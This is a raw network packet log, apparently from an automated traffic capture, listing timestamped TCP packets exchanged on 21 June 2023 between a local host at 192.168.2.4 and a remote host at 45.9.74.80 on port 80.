                                                                                                  Jun 21, 2023 20:23:59.264832020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264842987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.264842987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.264843941 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.264858961 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264885902 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264911890 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264938116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264965057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.264971018 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.264971018 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265000105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265026093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265033960 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265053988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265079975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265104055 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265106916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265134096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265160084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265186071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265211105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265237093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265247107 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265247107 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265263081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265278101 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265291929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265317917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265345097 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265369892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265396118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265415907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265415907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265424967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265460968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265487909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265513897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265516043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265516043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265516043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265541077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265573025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265600920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265625954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265640020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265640020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265657902 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265707016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265727043 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265732050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265759945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265770912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265785933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265813112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265839100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265866041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265911102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265937090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265948057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265948057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.265963078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.265990973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266016006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266041994 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266067982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266093016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266125917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266125917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266125917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266127110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266144991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266171932 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266196966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266222000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266248941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266274929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266290903 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266290903 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266304016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266334057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266351938 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266359091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266379118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266395092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266412020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266429901 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266447067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266463041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266489029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266505957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266531944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266547918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266547918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.266576052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.266748905 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.270509958 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.286107063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.287321091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.287396908 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.287431955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.287869930 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.291883945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.291913986 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.291939974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.291999102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292026997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292058945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292062044 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292105913 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292109013 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292131901 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292157888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292184114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292210102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292224884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292224884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292237043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292301893 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292319059 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292347908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292376041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292388916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292402983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292429924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292454958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292483091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292490005 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292490005 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292510033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292515039 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292536974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292562962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292588949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292614937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292640924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292666912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292680979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292680979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292680979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292691946 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292720079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292746067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292747021 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292773008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292798996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292818069 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292824030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292855024 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292861938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292890072 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292915106 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292927980 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.292968035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.292994022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293020964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293046951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293059111 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293059111 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293073893 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293083906 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293102980 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293128967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293154001 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293179989 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293204069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293229103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293253899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293281078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293304920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293318987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293318987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293318987 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293330908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293380022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293406010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293407917 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293432951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293458939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293482065 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293486118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293513060 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293539047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293545961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293566942 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293584108 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293601990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293618917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293636084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293661118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293685913 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293688059 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293715000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293756008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293781042 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293783903 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293783903 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293807030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293834925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293862104 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293879986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293889046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293915987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293941975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.293947935 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293947935 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.293998957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294024944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294047117 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294049978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294075012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294101954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294126987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294137001 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294152975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294159889 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294178009 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294203997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294246912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294249058 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294249058 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294275045 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294313908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294339895 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294364929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294365883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294393063 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294420004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294445992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294472933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294476986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294476986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294497967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294523954 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294526100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294553995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294579029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294580936 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294605970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294639111 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294680119 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294725895 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294751883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294778109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294792891 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294802904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294828892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294855118 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294856071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294883966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294910908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294935942 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294960976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294961929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.294964075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.294998884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295048952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295104027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295129061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295154095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295156956 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295157909 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295181036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295222044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295258045 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295283079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295300007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295300007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295300007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295309067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295336008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295363903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295388937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295416117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295443058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295469999 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295496941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295533895 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295542002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295542002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295542002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295542002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295558929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295578957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295598030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295615911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295631886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295650005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295667887 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295702934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295759916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295787096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295794964 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295794964 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295830011 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.295830965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295857906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295885086 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295912027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295937061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295963049 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.295989037 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296015978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296040058 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296042919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296041012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296041012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296070099 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296084881 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296097994 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296125889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296152115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296176910 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296202898 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296228886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296255112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.296281099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296281099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.296281099 CEST4970480192.168.2.445.9.74.80
